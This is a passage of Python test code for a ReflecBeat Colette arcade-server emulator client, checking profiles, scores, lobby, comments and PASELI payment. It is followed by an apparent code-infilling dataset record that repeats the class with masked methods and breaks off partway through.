                    # Phase-2 entries that should NOT beat the stored record
                    # carry 'expected_*' overrides with the record we expect
                    # the server to have kept.
                    if 'expected_score' in expected:
                        expected_score = expected['expected_score']
                    else:
                        expected_score = expected['score']
                    if 'expected_achievement_rate' in expected:
                        expected_achievement_rate = expected['expected_achievement_rate']
                    else:
                        expected_achievement_rate = expected['achievement_rate']
                    if 'expected_clear_type' in expected:
                        expected_clear_type = expected['expected_clear_type']
                    else:
                        expected_clear_type = expected['clear_type']
                    if 'expected_combo' in expected:
                        expected_combo = expected['expected_combo']
                    else:
                        expected_combo = expected['combo']
                    if 'expected_miss_count' in expected:
                        expected_miss_count = expected['expected_miss_count']
                    else:
                        expected_miss_count = expected['miss_count']

                    if actual['score'] != expected_score:
                        raise Exception('Expected a score of \'{}\' for song \'{}\' chart \'{}\' but got score \'{}\''.format(
                            expected_score, expected['id'], expected['chart'], actual['score'],
                        ))
                    if actual['achievement_rate'] != expected_achievement_rate:
                        raise Exception('Expected an achievement rate of \'{}\' for song \'{}\' chart \'{}\' but got achievement rate \'{}\''.format(
                            expected_achievement_rate, expected['id'], expected['chart'], actual['achievement_rate'],
                        ))
                    if actual['clear_type'] != expected_clear_type:
                        raise Exception('Expected a clear_type of \'{}\' for song \'{}\' chart \'{}\' but got clear_type \'{}\''.format(
                            expected_clear_type, expected['id'], expected['chart'], actual['clear_type'],
                        ))
                    if actual['combo'] != expected_combo:
                        raise Exception('Expected a combo of \'{}\' for song \'{}\' chart \'{}\' but got combo \'{}\''.format(
                            expected_combo, expected['id'], expected['chart'], actual['combo'],
                        ))
                    if actual['miss_count'] != expected_miss_count:
                        raise Exception('Expected a miss count of \'{}\' for song \'{}\' chart \'{}\' but got miss count \'{}\''.format(
                            expected_miss_count, expected['id'], expected['chart'], actual['miss_count'],
                        ))

                # Sleep so we don't end up putting in score history on the same second
                time.sleep(1)
        else:
            print("Skipping score checks for existing card")

        # Verify ending game
        self.verify_player_end(ref_id)

        # Verify high score tables
        self.verify_info_ranking()

        # Verify paseli handling
        if paseli_enabled:
            print("PASELI enabled for this PCBID, executing PASELI checks")
        else:
            print("PASELI disabled for this PCBID, skipping PASELI checks")
            return

        sessid, balance = self.verify_eacoin_checkin(card)
        if balance == 0:
            print("Skipping PASELI consume check because card has 0 balance")
        else:
            self.verify_eacoin_consume(sessid, balance, random.randint(0, balance))
        self.verify_eacoin_checkout(sessid)
|
normal
|
{
"blob_id": "f781377a52400abd617e7f0c5529726120b78476",
"index": 3426,
"step-1": "<mask token>\n\n\nclass ReflecBeatColette(BaseClient):\n <mask token>\n\n def verify_pcb_boot(self, loc: str) ->None:\n call = self.call_node()\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/pcb/sinfo/nm')\n self.assert_path(resp, 'response/pcb/sinfo/cl_enbl')\n self.assert_path(resp, 'response/pcb/sinfo/cl_h')\n self.assert_path(resp, 'response/pcb/sinfo/cl_m')\n <mask token>\n\n def verify_info_ranking(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/ver')\n self.assert_path(resp, 'response/info/ranking/weekly/bt')\n self.assert_path(resp, 'response/info/ranking/weekly/et')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/monthly/bt')\n self.assert_path(resp, 'response/info/ranking/monthly/et')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/total/bt')\n self.assert_path(resp, 'response/info/ranking/total/et')\n self.assert_path(resp, 'response/info/ranking/total/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/total/new/d/cnt')\n <mask token>\n\n def verify_player_delete(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_end(self, refid: str) ->None:\n call = self.call_node()\n player = 
Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_succeed(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/name')\n self.assert_path(resp, 'response/player/lv')\n self.assert_path(resp, 'response/player/exp')\n self.assert_path(resp, 'response/player/grd')\n self.assert_path(resp, 'response/player/ap')\n self.assert_path(resp, 'response/player/released')\n self.assert_path(resp, 'response/player/mrecord')\n\n def verify_player_read(self, refid: str, location: str) ->List[Dict[str,\n int]]:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/pdata/account/usrid')\n self.assert_path(resp, 'response/player/pdata/account/tpc')\n self.assert_path(resp, 'response/player/pdata/account/dpc')\n self.assert_path(resp, 'response/player/pdata/account/crd')\n self.assert_path(resp, 'response/player/pdata/account/brd')\n self.assert_path(resp, 'response/player/pdata/account/tdc')\n self.assert_path(resp, 'response/player/pdata/account/intrvld')\n self.assert_path(resp, 'response/player/pdata/account/ver')\n self.assert_path(resp, 'response/player/pdata/account/pst')\n self.assert_path(resp, 'response/player/pdata/account/st')\n self.assert_path(resp, 'response/player/pdata/base/name')\n self.assert_path(resp, 'response/player/pdata/base/exp')\n self.assert_path(resp, 'response/player/pdata/base/lv')\n 
self.assert_path(resp, 'response/player/pdata/base/mg')\n self.assert_path(resp, 'response/player/pdata/base/ap')\n self.assert_path(resp, 'response/player/pdata/base/tid')\n self.assert_path(resp, 'response/player/pdata/base/tname')\n self.assert_path(resp, 'response/player/pdata/base/cmnt')\n self.assert_path(resp, 'response/player/pdata/base/uattr')\n self.assert_path(resp, 'response/player/pdata/base/hidden_param')\n self.assert_path(resp, 'response/player/pdata/base/tbs')\n self.assert_path(resp, 'response/player/pdata/base/tbs_r')\n self.assert_path(resp, 'response/player/pdata/rival')\n self.assert_path(resp, 'response/player/pdata/fav_music_slot')\n self.assert_path(resp, 'response/player/pdata/custom')\n self.assert_path(resp, 'response/player/pdata/config')\n self.assert_path(resp, 'response/player/pdata/stamp')\n self.assert_path(resp, 'response/player/pdata/released')\n self.assert_path(resp, 'response/player/pdata/record')\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.\n format(resp.child_value('player/pdata/base/name')))\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n score = {'id': child.child_value('mid'), 'chart': child.\n child_value('ntgrd'), 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'), 'score': child\n .child_value('scr'), 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms')}\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[\n str, int]]) ->int:\n call = self.call_node()\n player = Node.void('player')\n call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n 
account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 
0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/uid')\n return resp.child_value('player/uid')\n <mask token>\n\n def verify_lobby_entry(self, location: str, extid: int) ->int:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 'response/lobby/interval_p')\n self.assert_path(resp, 'response/lobby/eid')\n self.assert_path(resp, 'response/lobby/e/eid')\n self.assert_path(resp, 'response/lobby/e/mid')\n self.assert_path(resp, 'response/lobby/e/ng')\n self.assert_path(resp, 'response/lobby/e/uid')\n self.assert_path(resp, 
'response/lobby/e/uattr')\n self.assert_path(resp, 'response/lobby/e/pn')\n self.assert_path(resp, 'response/lobby/e/mg')\n self.assert_path(resp, 'response/lobby/e/mopt')\n self.assert_path(resp, 'response/lobby/e/tid')\n self.assert_path(resp, 'response/lobby/e/tn')\n self.assert_path(resp, 'response/lobby/e/topt')\n self.assert_path(resp, 'response/lobby/e/lid')\n self.assert_path(resp, 'response/lobby/e/sn')\n self.assert_path(resp, 'response/lobby/e/pref')\n self.assert_path(resp, 'response/lobby/e/stg')\n self.assert_path(resp, 'response/lobby/e/pside')\n self.assert_path(resp, 'response/lobby/e/eatime')\n self.assert_path(resp, 'response/lobby/e/ga')\n self.assert_path(resp, 'response/lobby/e/gp')\n self.assert_path(resp, 'response/lobby/e/la')\n self.assert_path(resp, 'response/lobby/e/ver')\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) ->None:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby')\n\n def verify_pzlcmt_read(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/comment/time')\n self.assert_path(resp, 'response/info/c/uid')\n self.assert_path(resp, 'response/info/c/name')\n self.assert_path(resp, 'response/info/c/icon')\n self.assert_path(resp, 'response/info/c/bln')\n self.assert_path(resp, 'response/info/c/tid')\n self.assert_path(resp, 'response/info/c/t_name')\n self.assert_path(resp, 'response/info/c/pref')\n self.assert_path(resp, 'response/info/c/time')\n self.assert_path(resp, 
'response/info/c/comment')\n self.assert_path(resp, 'response/info/c/is_tweet')\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception(\"Invalid name '{}' returned for comment!\"\n .format(name))\n if comment != 'アメ〜〜!':\n raise Exception(\n \"Invalid comment '{}' returned for comment!\".format\n (comment))\n found = True\n if not found:\n raise Exception('Comment we posted was not found!')\n <mask token>\n\n def verify_jbrbcollabo_save(self, refid: str) ->None:\n call = self.call_node()\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/jbrbcollabo')\n\n def verify(self, cardid: Optional[str]) ->None:\n self.verify_services_get(expected_services=['pcbtracker',\n 'pcbevent', 'local', 'message', 'facility', 'cardmng',\n 'package', 'posevent', 'pkglist', 'dlstatus', 'eacoin', 'lobby',\n 'ntp', 'keepalive'])\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print('Generated random card ID {} for use.'.format(card))\n if cardid is None:\n self.verify_cardmng_inquire(card, msg_type='unregistered',\n paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception(\n \"Invalid refid '{}' returned when registering card\".\n format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new',\n 
paseli_enabled=paseli_enabled):\n raise Exception(\n \"Invalid refid '{}' returned when querying card\".format\n (ref_id))\n self.verify_player_start(ref_id)\n self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = self.verify_player_write(ref_id, location, [{'id': 0,\n 'chart': 0, 'clear_type': -1, 'achievement_rate': 0,\n 'score': 0, 'combo': 0, 'miss_count': 0}])\n else:\n print('Skipping new card checks for existing card')\n ref_id = self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled)\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled):\n raise Exception(\"Invalid refid '{}' returned when querying card\"\n .format(ref_id))\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n self.verify_jbrbcollabo_save(ref_id)\n if cardid is None:\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 2,\n 'achievement_rate': 7543, 'score': 432, 'combo': \n 123, 'miss_count': 5}, {'id': 1, 'chart': 0,\n 'clear_type': 4, 'achievement_rate': 9876, 'score':\n 543, 'combo': 543, 'miss_count': 0}, {'id': 3,\n 'chart': 2, 'clear_type': 2, 'achievement_rate': \n 1234, 'score': 123, 'combo': 42, 'miss_count': 54},\n {'id': 3, 'chart': 0, 'clear_type': 2,\n 'achievement_rate': 1024, 'score': 50, 'combo': 12,\n 'miss_count': 90}]\n if phase == 2:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 3,\n 'achievement_rate': 8765, 'score': 469, 'combo': \n 468, 'miss_count': 1}, {'id': 1, 'chart': 0,\n 'clear_type': 2, 'achievement_rate': 8765, 'score':\n 432, 'combo': 321, 'miss_count': 15,\n 'expected_score': 543, 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876, 'expected_combo':\n 543, 
'expected_miss_count': 0}]\n self.verify_player_write(ref_id, location, dummyscores)\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == expected['id'] and received[\n 'chart'] == expected['chart']:\n actual = received\n break\n if actual is None:\n raise Exception(\n \"Didn't find song {} chart {} in response!\".\n format(expected['id'], expected['chart']))\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected[\n 'expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate'\n ]\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n if actual['score'] != expected_score:\n raise Exception(\n \"Expected a score of '{}' for song '{}' chart '{}' but got score '{}'\"\n .format(expected_score, expected['id'],\n expected['chart'], actual['score']))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception(\n \"Expected an achievement rate of '{}' for song '{}' chart '{}' but got achievement rate '{}'\"\n .format(expected_achievement_rate, expected[\n 'id'], expected['chart'], actual[\n 'achievement_rate']))\n if actual['clear_type'] != expected_clear_type:\n raise Exception(\n \"Expected a clear_type of '{}' for song '{}' chart '{}' but got clear_type '{}'\"\n .format(expected_clear_type, expected['id'],\n expected['chart'], actual['clear_type']))\n if actual['combo'] != expected_combo:\n raise 
Exception(\n \"Expected a combo of '{}' for song '{}' chart '{}' but got combo '{}'\"\n .format(expected_combo, expected['id'],\n expected['chart'], actual['combo']))\n if actual['miss_count'] != expected_miss_count:\n raise Exception(\n \"Expected a miss count of '{}' for song '{}' chart '{}' but got miss count '{}'\"\n .format(expected_miss_count, expected['id'],\n expected['chart'], actual['miss_count']))\n time.sleep(1)\n else:\n print('Skipping score checks for existing card')\n self.verify_player_end(ref_id)\n self.verify_info_ranking()\n if paseli_enabled:\n print('PASELI enabled for this PCBID, executing PASELI checks')\n else:\n print('PASELI disabled for this PCBID, skipping PASELI checks')\n return\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print('Skipping PASELI consume check because card has 0 balance')\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0,\n balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-2": "<mask token>\n\n\nclass ReflecBeatColette(BaseClient):\n <mask token>\n\n def verify_pcb_boot(self, loc: str) ->None:\n call = self.call_node()\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/pcb/sinfo/nm')\n self.assert_path(resp, 'response/pcb/sinfo/cl_enbl')\n self.assert_path(resp, 'response/pcb/sinfo/cl_h')\n self.assert_path(resp, 'response/pcb/sinfo/cl_m')\n\n def verify_info_common(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'common')\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/event_ctrl')\n self.assert_path(resp, 'response/info/item_lock_ctrl')\n\n def verify_info_ranking(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/ver')\n self.assert_path(resp, 'response/info/ranking/weekly/bt')\n self.assert_path(resp, 'response/info/ranking/weekly/et')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/monthly/bt')\n self.assert_path(resp, 'response/info/ranking/monthly/et')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/total/bt')\n self.assert_path(resp, 'response/info/ranking/total/et')\n self.assert_path(resp, 'response/info/ranking/total/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/total/new/d/cnt')\n <mask token>\n\n def verify_player_delete(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n 
player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_end(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_succeed(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/name')\n self.assert_path(resp, 'response/player/lv')\n self.assert_path(resp, 'response/player/exp')\n self.assert_path(resp, 'response/player/grd')\n self.assert_path(resp, 'response/player/ap')\n self.assert_path(resp, 'response/player/released')\n self.assert_path(resp, 'response/player/mrecord')\n\n def verify_player_read(self, refid: str, location: str) ->List[Dict[str,\n int]]:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/pdata/account/usrid')\n self.assert_path(resp, 'response/player/pdata/account/tpc')\n self.assert_path(resp, 'response/player/pdata/account/dpc')\n self.assert_path(resp, 'response/player/pdata/account/crd')\n self.assert_path(resp, 'response/player/pdata/account/brd')\n self.assert_path(resp, 'response/player/pdata/account/tdc')\n self.assert_path(resp, 'response/player/pdata/account/intrvld')\n self.assert_path(resp, 'response/player/pdata/account/ver')\n self.assert_path(resp, 
'response/player/pdata/account/pst')\n self.assert_path(resp, 'response/player/pdata/account/st')\n self.assert_path(resp, 'response/player/pdata/base/name')\n self.assert_path(resp, 'response/player/pdata/base/exp')\n self.assert_path(resp, 'response/player/pdata/base/lv')\n self.assert_path(resp, 'response/player/pdata/base/mg')\n self.assert_path(resp, 'response/player/pdata/base/ap')\n self.assert_path(resp, 'response/player/pdata/base/tid')\n self.assert_path(resp, 'response/player/pdata/base/tname')\n self.assert_path(resp, 'response/player/pdata/base/cmnt')\n self.assert_path(resp, 'response/player/pdata/base/uattr')\n self.assert_path(resp, 'response/player/pdata/base/hidden_param')\n self.assert_path(resp, 'response/player/pdata/base/tbs')\n self.assert_path(resp, 'response/player/pdata/base/tbs_r')\n self.assert_path(resp, 'response/player/pdata/rival')\n self.assert_path(resp, 'response/player/pdata/fav_music_slot')\n self.assert_path(resp, 'response/player/pdata/custom')\n self.assert_path(resp, 'response/player/pdata/config')\n self.assert_path(resp, 'response/player/pdata/stamp')\n self.assert_path(resp, 'response/player/pdata/released')\n self.assert_path(resp, 'response/player/pdata/record')\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.\n format(resp.child_value('player/pdata/base/name')))\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n score = {'id': child.child_value('mid'), 'chart': child.\n child_value('ntgrd'), 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'), 'score': child\n .child_value('scr'), 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms')}\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[\n str, int]]) ->int:\n call = self.call_node()\n player = Node.void('player')\n 
call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n 
log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/uid')\n return resp.child_value('player/uid')\n <mask token>\n\n def verify_lobby_entry(self, location: str, extid: int) ->int:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 
